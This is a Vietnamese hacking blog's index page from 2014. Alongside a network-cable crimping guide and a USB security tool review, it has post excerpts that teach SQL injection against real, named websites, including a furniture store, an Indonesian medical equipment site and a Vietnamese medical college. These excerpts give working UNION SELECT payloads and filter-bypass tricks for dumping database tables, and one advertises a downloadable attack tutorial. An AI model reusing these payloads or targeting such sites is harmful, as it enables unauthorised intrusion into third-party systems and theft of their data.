Hacking - Security

Welcome to Mr Quý's Blog

Thứ Ba, 4 tháng 11, 2014

Cách bấm cáp mạng (Cáp RJ45) (Bấm thẳng + Bấm chéo)

1. Các kiểu bấm cáp và khi nào dùng kiểu này Đối với cáp RJ45 thì có 2 kiểu bấm là : Bấm thẳng + Bấm chéo. Bấm thẳng: Kiểu này dùng để nối 2 thiết bị khác loại lại với nhau. VD: PC + Switch, Switch + Router .... Lý do: Đầu nhận của bên này là đầu gửi của bên kia rồi nên bấm thẳng sẽ dùng nối 2 thiết bị khác loại Bấm chéo: Kiểu này dùng để nối 2 thiết bị cùng loại lại với nhau. VD: PC-PC, PC-Router ... Lý do: Đầu nhận của bên này là đầu nhận của...

Thứ Ba, 21 tháng 10, 2014

Thông Tin Về Tôi

Họ & Tên: Huỳnh Ngọc QuýLớp: 14KTHD1Trường: Trung Cấp Nghề Kỹ Thuật Công Nghệ Hùng VươngSở thích: Nge nhạc thư giản một mìnhLĩnh vực đang tham gia: Hacking - Security, chuyên về SQL injection Tôi bắt đầu tham gia vào Thế Giới Hacking vào cuối tháng 9 năm 2013 và cho đến nay, tôi đã từng tham gia nhiều các diễn đàn Hacker như http://ceh.vn/ , http://hvaonline.com/ , http://mumauden.org/ và đây là trang blog Hacking của tôi http://quyhuynhsqli.blogspot.com/...

Thứ Năm, 9 tháng 10, 2014

USB Disk Security 6: ‘Khắc tinh’ của virus USB

Các tính năng mới trong USB Disk Security 6.0.0.126: - Tính năng Safe Open cho phép bạn xem nội dung các file trên USB ở chế độ an toàn. - Tạo “khóa chống ghi” dữ liệu trên USB.             - Vô hiệu cổng USB trên máy tính. Download tại Đây Giao diện USB Disk Security 6.0 được “tút” lại theo phong cách hoàn toàn mới với tông màu xanh, các nút nhấn được bố trí phía trái trông khá gọn gàng....

Thứ Sáu, 26 tháng 9, 2014

Hướng dẫn SQLi bài cơ bản

SQLi cơ bản Victim: http://noithatgiathanh.com.vn/ Get order by bình thường chắc các bạn cũng biết query rồi Order by ...--+- Sau khi ra được phần Order by ta Union Select nó để get version Get version: Version() Get Table: http://noithatgiathanh.com.vn/?frame=product_detail&id=-738 UNION all /*!50000SELECT*/ 1,2,unhex(hex(group_concat(/*!50000table_name*/))),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.tables where table_schema=database()--+- Đây là trường hơp khi mình query theo cách bình thường nhưng ko thấy hiện...

Hướng dẫn check site chặn ký tự và query

Victim: http://www.alatkesehatan.co.id Lưu ý: site này bị cắn query "concat" và chặn luôn dấu "( )" nhé. Ta tìm version: http://www.alatkesehatan.co.id/products/category/?id=null /*!50000UNION SELECT*/ 1,2,3,4;&nm=doctor_equipment ra được số "2" thay version vào http://www.alatkesehatan.co.id/products/category/?id=null /*!50000UNION SELECT*/ 1,@@version,3,4;&nm=doctor_equipment =>  5.5.34-log Get Table: http://www.alatkesehatan.co.id/products/category/?id=null /*!50000UNION SELECT*/ 1,/*!10000table_name,3,4 from /*!10000information_schema*/.tables...

Thứ Năm, 25 tháng 9, 2014

Check Site SQL Trường Cao Đẳng Y Tế Cần Thơ

Check Site SQL Cao Đẳng Y Tế Cần Thơ Bypass chặn: () , -- -, group_concat, concat_ws, chặn dấu = => Thay thế dấu "=" thành chữ "Like" => Thay thế khoảng trống và phía sau: %0A, /**/, --Download TUT tại ĐâyPass giải nén: quyhuynhsqlKhi share nhớ để lại nguồn. Bài viết và Tut rất rõ ràng, bạn nào chưa hiểu có thể pm hỏi mình qua FB của mình có sẵn trên nút FB của blog Quý Huỳnh - Admin VN - Hacking Gro...

Ý Nghĩa Các Ký Tự Trong SQLi

Mình sẽ trình bày cho các bạn Newbie về các dấu ký tự khi đặt vào tham số (dork) hoặc dòng lệnh (Query):+ Dấu nháy đơn ( ' ): Dấu nháy này thường các bạn đặt nó đằng sau tham số mà các bạn tìm được, vd: "php?id=1' " .Dấu này trong ngôn ngữ SQL dùng để “gói” chuỗi. Chúng ta thường hay thêm nó vào sau tham số (dork) để kiểm tra có lỗi hay không. + Dấu gạch ngang ( - ): Cũng giống như trên nhưng nó đặt trước kiểu số tham sốvd: "php?id=-1" Lưu ý: 2 dâu trên chúng ta phải tùy biến, ko phải lúc nào đặt dấu nháy là nó lỗi hoặc dấu gạch ngang là...